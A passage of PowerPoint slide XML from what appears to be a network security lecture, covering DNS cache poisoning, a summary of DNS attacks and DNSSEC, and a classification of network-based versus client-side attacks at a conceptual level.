          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>authoritative</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS for poly.edu </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40975" name="Line 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6834188" y="3381375"/>
            <a:ext cx="1106487" cy="668338"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40976" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5218113" y="6037263"/>
            <a:ext cx="474662" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40977" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6799263" y="4876800"/>
            <a:ext cx="1160462" cy="158750"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40978" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="8493125"/>
            <a:ext cx="4310063" cy="869950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS response can provide IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>address of malicious server!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40979" name="Freeform 34"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3109913" y="4314825"/>
            <a:ext cx="4884737" cy="614363"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2164"/>
              <a:gd name="T1" fmla="*/ 0 h 272"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2164"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 272"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2164"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 272"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2164"/>
              <a:gd name="T10" fmla="*/ 0 h 272"/>
              <a:gd name="T11" fmla="*/ 2164 w 2164"/>
              <a:gd name="T12" fmla="*/ 272 h 272"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2164" h="272">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="707" y="43"/>
                  <a:pt x="1414" y="87"/>
                  <a:pt x="1775" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2136" y="177"/>
                  <a:pt x="2099" y="249"/>
                  <a:pt x="2164" y="272"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40980" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5497513" y="5332413"/>
            <a:ext cx="2303462" cy="1582737"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4171AC88-BFE3-458E-A96B-8E3BCA3C9993}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="914400"/>
            <a:ext cx="11703050" cy="6762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DNS Poisoning (4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41988" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Issues: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buFont typeface="ZapfDingbats" pitchFamily="82" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Attacker needs to know transaction number in  request message sent to upstream server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Not easy!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Attacker may need to stop upstream name server from responding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>So that server under attack doesn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>t get suspicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ping of death, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, overflows, et al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="ZapfDingbats" pitchFamily="82" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{B24C34C5-9284-4182-B365-24766267A590}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="1066800"/>
            <a:ext cx="11703050" cy="7524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DNS attacks: Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50181" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DNS is a critical component of the Internet infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>But is surprisingly robust:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> attacks against root servers have been largely unsuccessful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Poisoning and redirection attacks are difficult unless you can sniff DNS requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>And even so, may need to stop DNS servers from replying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DNS can be leveraged for reflection attacks against non-DNS nodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DNSsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> address many of these issues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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{5D4A0799-0C91-4F15-BF2C-C94E4A2980D1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="1066800"/>
            <a:ext cx="11703050" cy="7524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Attack Classification	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network based attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Taking advantage of a vulnerability in a network resource in order to gain privileged access to resources. (example – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>netbios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> vulnerabilities on workstations, server application vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client Side Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Taking advantage of a vulnerability in software loaded and used by an ‘end user’ in order to gain privileged access. (example – web browser vulnerabilities, pdf reader)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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{73F27997-5313-4420-AF5A-6F0116221FF7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Rectangle 2"/>
